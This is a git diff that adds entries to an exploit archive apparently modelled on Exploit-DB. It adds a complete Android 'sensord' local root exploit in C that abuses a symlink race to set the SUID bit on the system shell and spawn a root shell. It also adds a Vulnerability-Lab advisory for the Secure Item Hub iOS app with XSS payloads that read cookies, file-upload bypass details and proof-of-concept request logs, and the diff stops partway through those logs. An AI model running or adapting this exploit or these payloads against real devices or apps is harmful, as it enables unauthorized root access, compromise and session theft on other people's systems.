diff --git a/files.csv b/files.csv
index fdf8ddb6b..7680a3dfd 100755
--- a/files.csv
+++ b/files.csv
@@ -35573,3 +35573,14 @@ id,file,description,date,author,platform,type,port
 39329,platforms/windows/dos/39329.py,"InfraRecorder '.m3u' File Buffer Overflow Vulnerability",2014-05-25,"Osanda Malith",windows,dos,0
 39330,platforms/windows/dos/39330.txt,"Foxit Reader <= 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0
 39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 Denial Of Service Vulnerability",2014-05-14,j0s3h4x0r,windows,dos,0
+39332,platforms/php/webapps/39332.txt,"Wiser Backup Information Disclosure Vulnerability",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39333,platforms/php/webapps/39333.html,"WordPress Elegance Theme 'elegance/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0
+39334,platforms/java/webapps/39334.txt,"Yealink VoIP Phones '/servlet' HTTP Response Splitting Vulnerability",2014-06-12,"Jesus Oquendo",java,webapps,0
+39335,platforms/ios/webapps/39335.txt,"Secure Item Hub 1.0 iOS - Multiple Vulnerabilities",2016-01-27,Vulnerability-Lab,ios,webapps,8080
+39336,platforms/linux/shellcode/39336.c,"Linux x86/x86_64 tcp_bind Shellcode",2016-01-27,B3mB4m,linux,shellcode,0
+39337,platforms/linux/shellcode/39337.c,"Linux x86/x86_64 tcp_bind Shellcode #2",2016-01-27,B3mB4m,linux,shellcode,0
+39338,platforms/linux/shellcode/39338.c,"Linux x86/x86_64 Read etc/passwd Shellcode",2016-01-27,B3mB4m,linux,shellcode,0
+39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80
+39340,platforms/android/local/39340.cpp,"Android sensord Local Root Exploit",2016-01-27,s0m3b0dy,android,local,0
+39341,platforms/php/webapps/39341.txt,"WordPress Booking Calendar Contact Form <=1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80
+39342,platforms/php/webapps/39342.txt,"WordPress Booking Calendar Contact Form<=1.1.24 - addslashes SQL Injection Vulnerability",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80
diff --git a/platforms/android/local/39340.cpp b/platforms/android/local/39340.cpp
new file mode 100755
index 000000000..b74f592a5
--- /dev/null
+++ b/platforms/android/local/39340.cpp
@@ -0,0 +1,474 @@
+
+/*
+ * Android sensord 0day root exploit by s0m3b0dy
+ * tested on LG L7 (PL)
+ *
+ *
+ * need pentests? s0m3b0dy1(at)gmail.com
+ *
+ * * * * * * * * * * * * * * * * * * * * * * * *
+ *
+ * some Android devices have sensord deamon,
+ * for some ROMs the deamon is running as root process(there we can use this exploit)
+ *
+ * and
+ *---------
+ * root@android:/ # strace sensord
+ * ...
+ * open("/data/misc/sensor/fifo_cmd", O_RDWR|O_LARGEFILE) = 12
+ * ...
+ * open("/data/misc/sensor/fifo_dat", O_RDWR|O_LARGEFILE) = 13
+ * fchmod(12, 0666)                        = 0
+ * fchmod(13, 0666)                        = 0
+ * ---------
+ * there is no check that the files are not links, so we can link it to eg. block device and make it rw!
+ * exploit will set bit suid on /system/bin/mksh, need to reboot the device after step 1 and step 2
+ *
+ * this exploit is dangerous, before step 1 exploit is disabling auto-rotate to not overwrite /system pertition!
+ *
+ * the author is not responsible for any damage
+ * for education purpose only :)
+ *
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <dirent.h>
+#include <ctype.h>
+
+
+#define FIFO_DAT "/data/misc/sensor/fifo_dat"
+#define SH "/system/bin/mksh"
+
+struct ext4_super_block {
+ /*00*/  __le32  s_inodes_count;
+         __le32  s_blocks_count_lo;
+         __le32  s_r_blocks_count_lo;
+         __le32  s_free_blocks_count_lo;
+ /*10*/  __le32  s_free_inodes_count;
+         __le32  s_first_data_block;
+         __le32  s_log_block_size;
+         __le32  s_log_cluster_size;
+ /*20*/  __le32  s_blocks_per_group;
+         __le32  s_clusters_per_group;
+         __le32  s_inodes_per_group;
+         __le32  s_mtime;
+ /*30*/  __le32  s_wtime;
+         __le16  s_mnt_count;
+         __le16  s_max_mnt_count;
+         __le16  s_magic;
+         __le16  s_state;
+         __le16  s_errors;
+         __le16  s_minor_rev_level;
+ /*40*/  __le32  s_lastcheck;
+         __le32  s_checkinterval;
+         __le32  s_creator_os;
+         __le32  s_rev_level;
+ /*50*/  __le16  s_def_resuid;
+         __le16  s_def_resgid;
+         __le32  s_first_ino;
+         __le16  s_inode_size;
+         __le16  s_block_group_nr;
+         __le32  s_feature_compat;
+ /*60*/  __le32  s_feature_incompat;
+         __le32  s_feature_ro_compat;
+ /*68*/  __u8    s_uuid[16];
+ /*78*/  char    s_volume_name[16];
+ /*88*/  char    s_last_mounted[64];
+ /*C8*/  __le32  s_algorithm_usage_bitmap;
+         __u8    s_prealloc_blocks;
+         __u8    s_prealloc_dir_blocks;
+         __le16  s_reserved_gdt_blocks;
+ /*D0*/  __u8    s_journal_uuid[16];
+ /*E0*/  __le32  s_journal_inum;
+         __le32  s_journal_dev;
+         __le32  s_last_orphan;
+         __le32  s_hash_seed[4];
+         __u8    s_def_hash_version;
+         __u8    s_jnl_backup_type;
+         __le16  s_desc_size;
+ /*100*/ __le32  s_default_mount_opts;
+         __le32  s_first_meta_bg;
+         __le32  s_mkfs_time;
+         __le32  s_jnl_blocks[17];
+ /*150*/ __le32  s_blocks_count_hi;
+         __le32  s_r_blocks_count_hi;
+         __le32  s_free_blocks_count_hi;
+         __le16  s_min_extra_isize;
+         __le16  s_want_extra_isize;
+         __le32  s_flags;
+         __le16  s_raid_stride;
+         __le16  s_mmp_update_interval;
+         __le64  s_mmp_block;
+         __le32  s_raid_stripe_width;
+         __u8    s_log_groups_per_flex;
+         __u8    s_checksum_type;
+         __u8    s_encryption_level;
+         __u8    s_reserved_pad;
+         __le64  s_kbytes_written;
+         __le32  s_snapshot_inum;
+         __le32  s_snapshot_id;
+         __le64  s_snapshot_r_blocks_count;
+         __le32  s_snapshot_list;
+ #define EXT4_S_ERR_START offsetof(struct ext4_super_block, s_error_count)
+         __le32  s_error_count;
+         __le32  s_first_error_time;
+         __le32  s_first_error_ino;
+         __le64  s_first_error_block;
+         __u8    s_first_error_func[32];
+         __le32  s_first_error_line;
+         __le32  s_last_error_time;
+         __le32  s_last_error_ino;
+         __le32  s_last_error_line;
+         __le64  s_last_error_block;
+         __u8    s_last_error_func[32];
+ #define EXT4_S_ERR_END offsetof(struct ext4_super_block, s_mount_opts)
+         __u8    s_mount_opts[64];
+         __le32  s_usr_quota_inum;
+         __le32  s_grp_quota_inum;
+         __le32  s_overhead_clusters;
+         __le32  s_backup_bgs[2];
+         __u8    s_encrypt_algos[4];
+         __u8    s_encrypt_pw_salt[16];
+         __le32  s_lpf_ino;
+         __le32  s_prj_quota_inum;
+         __le32  s_checksum_seed;
+         __le32  s_reserved[98];
+        __le32  s_checksum;
+};
+
+struct ext4_group_desc
+{
+         __le32  bg_block_bitmap_lo;
+         __le32  bg_inode_bitmap_lo;
+         __le32  bg_inode_table_lo;
+         __le16  bg_free_blocks_count_lo;
+         __le16  bg_free_inodes_count_lo;
+         __le16  bg_used_dirs_count_lo;
+         __le16  bg_flags;
+         __le32  bg_exclude_bitmap_lo;
+         __le16  bg_block_bitmap_csum_lo;
+         __le16  bg_inode_bitmap_csum_lo;
+         __le16  bg_itable_unused_lo;
+         __le16  bg_checksum;
+         __le32  bg_block_bitmap_hi;
+         __le32  bg_inode_bitmap_hi;
+         __le32  bg_inode_table_hi;
+         __le16  bg_free_blocks_count_hi;
+         __le16  bg_free_inodes_count_hi;
+         __le16  bg_used_dirs_count_hi;
+         __le16  bg_itable_unused_hi;
+         __le32  bg_exclude_bitmap_hi;
+         __le16  bg_block_bitmap_csum_hi;
+         __le16  bg_inode_bitmap_csum_hi;
+         __u32   bg_reserved;
+ };
+
+struct ext4_inode {
+         __le16  i_mode;
+         __le16  i_uid;
+         __le32  i_size_lo;
+         __le32  i_atime;
+         __le32  i_ctime;
+         __le32  i_mtime;
+         __le32  i_dtime;
+         __le16  i_gid;
+         __le16  i_links_count;
+         __le32  i_blocks_lo;
+         __le32  i_flags;
+         union {
+                 struct {
+                         __le32  l_i_version;
+                 } linux1;
+                 struct {
+                         __u32  h_i_translator;
+                 } hurd1;
+                 struct {
+                         __u32  m_i_reserved1;
+                 } masix1;
+         } osd1;
+         __le32  i_block[15];
+         __le32  i_generation;
+         __le32  i_file_acl_lo;
+         __le32  i_size_high;
+         __le32  i_obso_faddr;
+         union {
+                 struct {
+                         __le16  l_i_blocks_high;
+                         __le16  l_i_file_acl_high;
+                         __le16  l_i_uid_high;
+                         __le16  l_i_gid_high;
+                         __le16  l_i_checksum_lo;
+                         __le16  l_i_reserved;
+                 } linux2;
+                 struct {
+                         __le16  h_i_reserved1;
+                         __u16   h_i_mode_high;
+                         __u16   h_i_uid_high;
+                         __u16   h_i_gid_high;
+                         __u32   h_i_author;
+                 } hurd2;
+                 struct {
+                         __le16  h_i_reserved1;
+                         __le16  m_i_file_acl_high;
+                         __u32   m_i_reserved2[2];
+                 } masix2;
+         } osd2;
+         __le16  i_extra_isize;
+         __le16  i_checksum_hi;
+         __le32  i_ctime_extra;
+         __le32  i_mtime_extra;
+         __le32  i_atime_extra;
+         __le32  i_crtime;
+         __le32  i_crtime_extra;
+         __le32  i_version_hi;
+ };
+
+void print_usage( char ** argv)
+{
+    printf("Have 3 steps. You need to reboot the device after step 1 and step 2.\n");
+    printf("Usage: %s 1\n", argv[0]);
+    printf("       %s 2\n", argv[0]);
+    printf("       %s 3\n", argv[0]);
+    printf("       %s verify\n", argv[0]);
+}
+
+void get_system_dev( char *ptr, int size )
+{
+    int fd = open("/proc/mounts", O_RDONLY);
+    int pos = 0, posend = 0, tmppos = 0;
+    char buff[4096];
+    char link[1024];
+    memset(buff, 0, sizeof(buff));
+    memset(link, 0, sizeof(link));
+    memset(ptr, 0, size);
+    if(fd != -1)
+    {
+        read(fd, &buff, sizeof(buff));
+        int sres = (int)strstr(buff, " /system ");
+        if( (sres != -1) && ((pos = (sres - (int)buff)) > 0) )
+        {
+            tmppos = pos;
+            int i=0;
+            while( (buff[pos] != '\n') && (pos > 0) ) pos--;
+            pos++;
+            strncpy(link, &buff[pos], tmppos - pos);
+            readlink(link, ptr, size);
+
+        }
+        else
+        {
+            printf("[-] Can't find system partition!\n");
+            close(fd);
+            exit(0);
+        }
+        close(fd);
+    }
+    else
+    {
+        printf("[-] Can't read /proc/mounts file!\n");
+        exit(0);
+    }
+
+}
+
+void first_step()
+{
+    if( access(FIFO_DAT, F_OK) != -1 )
+    {
+        unlink(FIFO_DAT);
+    }
+
+
+    char path[1024];
+    get_system_dev(path, sizeof(path));
+    symlink(path, FIFO_DAT);
+
+    printf("[+] Symlink is created, please reboot device and run second step.\n[+] The device may slow down, after second step will work normally.\n");
+}
+
+void second_step()
+{
+    char path[1024];
+    struct stat s;
+
+    unlink(FIFO_DAT);
+
+    stat(SH, &s);
+    printf("[+] Looking for inode no.: %llu\n", s.st_ino);
+
+    get_system_dev(path, sizeof(path));
+
+    int fd = open(path, O_RDWR);
+    if( fd != -1 )
+    {
+        int inodeno = s.st_ino;
+        struct ext4_super_block super;
+        struct ext4_group_desc group_descr;
+        struct ext4_inode inode;
+
+        unsigned long int offset=0;
+        lseek(fd, 0x400, SEEK_SET);
+
+        read(fd, &super, sizeof(super));
+
+        int block_size = 1024 << super.s_log_block_size;
+        int bg = (inodeno-1) /super.s_inodes_per_group;
+
+        lseek(fd, block_size + bg * (super.s_desc_size ? super.s_desc_size : sizeof(struct ext4_group_desc) ), SEEK_SET);
+        read(fd, &group_descr, sizeof(group_descr));
+
+
+        unsigned int index = (inodeno-1) % super.s_inodes_per_group;
+        unsigned int off = index *  super.s_inode_size;
+        unsigned long total_offset = block_size + (group_descr.bg_inode_table_lo-1) * block_size + off;
+
+        lseek(fd, total_offset, SEEK_SET);
+        read(fd, &inode, sizeof(struct ext4_inode));
+
+        if(inode.i_size_lo == s.st_size) {
+            __le16 mode = 0;
+            printf("[+] Found inode!\n");
+            lseek(fd, total_offset, SEEK_SET);
+
+            inode.i_mode = inode.i_mode | 0x800;
+
+            int modesize = sizeof(inode.i_mode);
+            int wr = write(fd, &inode.i_mode, modesize);
+
+            if( wr == modesize )
+            {
+                printf("[+] Success, bit SUID is setted on %s\n[+] You must reboot the device to run third step\n", SH);
+            }
+            else
+            {
+                printf("[-] Can't set bit SUID on %s\n", SH);
+            }
+        }
+        else
+        {
+            printf("[-] Can't find inode!\n");
+        }
+        close(fd);
+    }
+    else
+        printf("[-] Can't open %s!\n", path);
+
+}
+
+void third_step()
+{
+    char path[1024];
+    //chmod(SH, 4755);
+    setuid(0);
+    setgid(0);
+    if(getuid() == 0)
+    {
+
+        get_system_dev(path, sizeof(path));
+        chmod(path, 0600);
+        printf("[+] Rooted!\n");
+        system(SH);
+    }
+    else
+    {
+        printf("[-] No root here!\n");
+        exit(0);
+    }
+}
+
+bool isSensord(char *spath)
+{
+    char buff[50];
+    bool res = false;
+    int fd = open(spath, O_RDONLY);
+    if(fd != -1)
+    {
+        read(fd, buff, 50);
+        if(strstr(buff, "/system/bin/sensord") != NULL)
+        {
+            res = true;
+        }
+        close(fd);
+    }
+    return res;
+}
+
+bool verify()
+{
+    DIR* dir;
+    struct dirent *entry;
+    char spath[512];
+    bool res = false;
+    struct stat s;
+
+    dir = opendir("/proc");
+    if(dir) {
+        while ((entry = readdir(dir)) != NULL) {
+            if (entry->d_type == DT_DIR) {
+                snprintf(spath, 512, "/proc/%s/cmdline", entry->d_name);
+
+                if (isSensord(spath)) {
+                    stat(spath, &s);
+                    if (s.st_uid == 0)
+                        res = true;
+
+                    break;
+                }
+            }
+        }
+        closedir(dir);
+    }
+    return res;
+}
+
+void disable_autorotate()
+{
+    printf("[+] Disabling auto-rotate...\n");
+    system("content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:0");
+}
+
+int main(int argc, char **argv)
+{
+
+    if(argc != 2)
+    {
+        print_usage( argv );
+        return 0;
+    }
+
+    if( strstr( argv[1], "1" ) != NULL) {
+        if( verify() ) {
+            disable_autorotate();
+            first_step();                       //create link
+        }
+        else
+        {
+            printf("[-] It looks likey is not vulnerable!\n");
+        }
+    }
+    else if( strstr( argv[1], "2") != NULL) {
+        second_step();                          //edit ext4(/system) partition(set bit suid)
+    }
+    else if( strstr( argv[1], "3") != NULL) {
+        third_step();                           //get root shell
+    }
+    else if( strstr( argv[1], "verify") != NULL){
+        if( verify() )
+            printf("[+] Should be vulnerable!\n");
+        else
+            printf("[-] Not vulnerable!\n");
+    }
+    else{
+            print_usage( argv );
+    }
+
+
+
+    return 0;
+}
\ No newline at end of file
diff --git a/platforms/ios/webapps/39335.txt b/platforms/ios/webapps/39335.txt
new file mode 100755
index 000000000..761c79472
--- /dev/null
+++ b/platforms/ios/webapps/39335.txt
@@ -0,0 +1,465 @@
+Document Title:
+===============
+Secure Item Hub v1.0 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1682
+
+
+Release Date:
+=============
+2016-01-27
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1682
+
+
+Common Vulnerability Scoring System:
+====================================
+7.3
+
+
+Product & Service Introduction:
+===============================
+Transfer files to and from any computer connected to the same WiFi network as your iPhone or iPad using just a web browser! Just drag and drop 
+files into the browser (requires a current version of Chrome, Firefox or Safari) and watch the files appear on your device. You can also connect 
+to other iOS devices that have the Secure Item Hub app and transfer files directly between devices!
+
+(Copy of the Homepage: https://itunes.apple.com/in/app/secure-item-hub-wifi-file/id537353277 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2016-01-27:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Pinfolio LLC
+Product: Secure Item Hub - WiFi File Sharing 1.0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1
+An arbitrary file upload web vulnerability has been discovered in the Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
+The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path 
+commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with malicious `filename` 
+values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir 
+listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload by usage of the wifi interface or the local file sync function.
+The attacker can also attach multiple file extensions to bypass the web-server file validation to execute a malicious web-shell finally. Remote attackers can 
+exchange the filename with a double or tripple extension via POST method to bypass the upload validation and filter process. After the upload the attacker access 
+the file with one extension and exchange it with the other one to execute for example own php codes.
+
+Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious attack requests. 
+The attack vector is located on the application-side of the wifi service and the request method to inject is POST. 
+
+The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7. 
+Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged web-application user account. 
+Successful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise.
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] Upload
+				[+] Rename
+
+Vulnerable Parameter(s):
+				[+] filename
+				[+] pairs
+
+Affected Module(s):
+				[+] Index File Dir Listing (http://localhost:8000/)
+
+
+
+1.2
+A local command/path injection web vulnerabilities has been discovered  in the official Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
+The vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
+
+The vulnerability is located in the vulnerable `devicename` value that becomes visible in the `file dir (index)` module. Local attackers are able to inject own 
+malicious system specific commands or path value requests in the vulnerable `devicename` value. The execution of the local command inject occurs in the `index` 
+module of the mobile application. The attacker is able to manipulate the header name information of the application by preparing to change the local devicename. 
+The encoding of the vulnerable values in the index header module is broken.
+
+The attack vector is on the application-side and the injection requires physical device access or a local low privileged user account. Local attackers are also 
+able to exploit the filename validation issue in combination with persistent injected script codes to execute different local malicious attacks requests.
+
+The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1.
+Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. 
+Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to 
+compromise the mobile iOS application or the connected device components.
+
+Request Method(s):
+				[+] [SYNC]
+
+Vulnerable Module(s):
+				[+] Header Location - Web Application
+
+Vulnerable Parameter(s):
+				[+] devicename (HierarchyText)
+
+Affected Module(s):
+				[+] Index File Dir Listing (http://localhost:8000/)
+
+
+
+
+1.3
+A persistent input validation web vulnerability has been discovered  in the official Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
+The vulnerability allows remote attacker to inject malicious persistent script codes to the application-side of the mobile application.
+
+The vulnerability is located in the path and name (class) values of the `New Folder` and `NewTextFile` modules. The request method to inject is POST and 
+the attack vector is located on the application-side of the mobile app. Remote attackers are able to inject via POST own malicious script codes to compromise 
+the wifi web-application index file dir listing. The validation and encoding of the `New Folder` and `NewTextFile` modules are broken and allows to inject 
+malicious persistent script codes.
+
+The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6.
+Exploitation of the application-side web vulnerability requires no privileged web-application user account and only low or medium user interaction.
+Successful exploitation of the vulnerabilities results in persistent phishing, session hijacking, persistent external redirect to malicious 
+sources and application-side manipulation of affected or connected module context.
+
+Request Method(s):
+					[+] [POST]
+
+Vulnerable Module(s):
+					[+] NewTextFile
+					[+] New Folder
+
+Vulnerable Parameter(s):
+					[+] path
+					[+] name (class)
+
+Affected Module(s):
+					[+] Index File Dir Listing (http://localhost:8000/)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The arbitrary file upload web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+PoC:
+<tr><td width="20"> </td><td width="50"><input id="checkbox_0" type="checkbox"></td><td valign="top" width="70">
+<a href=">"><iframe>.png" target="_blank"><img border=0 class=thumbnail src=">"><iframe>.png"></a></td><td valign=top><div>
+<a target="_blank" class=DirectoryListingLink href="[ARBITRARY FILE UPLOAD VULNERABILITY!].png</a></div><div style="padding-top:5px;" 
+class="SmallText">PNG Image | 538 bytes | modified Mo., 25. Jan., 10:44<BR>
+<span class=SmallTextButton onclick="renameItem(0);">Rename</span></div></td></tr></table></div></div>
+
+
+-- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost:8080/Files// Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[156] Mime Type[text/html]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[http://localhost:8080/Files/]
+      Content-Length[722]
+      Content-Type[multipart/form-data; boundary=---------------------------32641154472465]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------32641154472465
+Content-Disposition: form-data; name="file"; filename="[ARBITRARY FILE UPLOAD VULNERABILITY!].png"
+Content-Type: image/png
+-
+Status: 200[OK]
+GET http://localhost:8080/Files/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[7148] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+      Cache-Control[max-age=0]
+   Response Header:
+      Content-Length[7148]
+      Date[Mon, 25 Jan 2016 09:42:53 GMT]
+      Server[Pinfolio (modified lighttpd)]
+-
+Status: 200[OK]
+POST http://localhost:8080/API/MoveItems Load Flags[LOAD_BACKGROUND  LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
+      Referer[http://localhost:8080/Files/]
+      Content-Length[39]
+      Connection[keep-alive]
+   POST-Daten:
+      pairs[2.png%09%3E%22%3E%3Ciframe%3E.png]
+   Response Header:
+      Content-Length[2]
+      Date[Mon, 25 Jan 2016 09:45:16 GMT]
+      Server[Pinfolio (modified lighttpd)]
+-
+Status: 200[OK]
+GET http://localhost:8080/Files/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[7198] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+      Cache-Control[max-age=0]
+   Response Header:
+      Content-Length[7198]
+      Date[Mon, 25 Jan 2016 09:45:18 GMT]
+      Server[Pinfolio (modified lighttpd)]
+
+
+1.2
+The local command inject web vulnerability can be exploited by local attackers with local privileged system user account and without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Index - Header Information (Web-Application)
+<title>Files</title>
+</head><body>
+<table border=0 cellpadding=0 cellspacing=0 style="width:100%;margin-top:40px;">
+	<tr>
+		<td width=65> </td>
+		<td valign=top>
+			<div class="HierarchyText">
+				<a href="/" class="HierarchyText"><b>ktest2 "><[COMMAND INJECT VULNERABILITY!]"></b></a>  > 
+				<span id="hierarchy"></span>
+			</div>
+			<div id="title" class="Title" style="padding-top:8px;padding-bottom:30px;">Files</div>
+		</td>
+		<td width=200 align=right valign=top>
+			<div id="signOutButtonArea" style="padding-top:20px;">
+				<span onclick="signOut();" style="cursor:pointer;">Sign Out</span>
+			</div>
+		</td>
+		<td width=65> </td>
+	</tr>
+</table>
+
+--- PoC Session Logs [GET]---
+GET http://localhost:8080/Files/ Load Flags[LOAD_FROM_CACHE  VALIDATE_NEVER  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[unbekannt]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[http://localhost:8080/]
+
+
+
+1.3
+The persistent input validation web vulnerabilities can be exploited by remote attackers without local privileged web-application user account and with low or medium user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: NewTextFile
+<tr><td width="20"> </td><td width="50"><input id="checkbox_0" type="checkbox"></td><td valign="top" width="70">
+<div style="padding-top:5px;"><img src="/Resources/img/folder-icon.png"></div></td><td valign="top"><div><a target="_self" 
+class="DirectoryListingLink" href=""><iframe src="a" onload="alert("PENTEST")" <"="[PERSISTENT INEJCTED SCRIPT CODE!]">"><iframe src=a onload=alert("PENTEST") <</a></div>
+<div style="padding-top:5px;"><span class=SmallTextButton onclick="renameItem(0);">Rename</span></div></td></tr></table></div>
+
+
+PoC: NewTextFile
+PoC: Folder
+<td valign="top"><div><a target="_self" class="DirectoryListingLink" href="<h>xxs link
+<a>[PERSISTENT INEJCTED SCRIPT CODE!]<img src=" c"="" onerror="alert(document.domain)">"><h>xxs link</h></a><a><img src="c" onerror="alert(document.cookie)"></a></div>
+<div style="padding-top:5px;"><span class="SmallTextButton" onclick="renameItem(0);">Rename</span></div></td>
+
+
+--- PoC Session Logs [POST]---
+Status: 200[OK]
+GET http://localhost:8080/Files/c[PERSISTENT SCRIPT CODE EXECUTION!] Load Flags[LOAD_DOCUMENT_URI  ] Größe des Inhalts[345] Mime Type[text/html]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[http://localhost:8080/Files/]
+      Connection[keep-alive]
+   Response Header:
+      Content-Type[text/html]
+      Content-Length[345]
+      Date[Mon, 25 Jan 2016 09:54:49 GMT]
+      Server[Pinfolio (modified lighttpd)]
+-
+Status: 200[OK]
+POST http://localhost:8080/API/NewTextFile Load Flags[LOAD_BACKGROUND  LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
+      Referer[http://localhost:8080/Files/]
+      Content-Length[56]
+      Connection[keep-alive]
+   POST-Daten:
+      path[%22%3E%3Cimg%3E%2520%22%3C[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!]%20src%3D%22c%22%3E]
+   Response Header:
+      Content-Length[2]
+      Date[Mon, 25 Jan 2016 09:54:55 GMT]
+      Server[Pinfolio (modified lighttpd)]
+-
+Status: 200[OK]
+GET http://localhost:8080/Files/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[9636] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
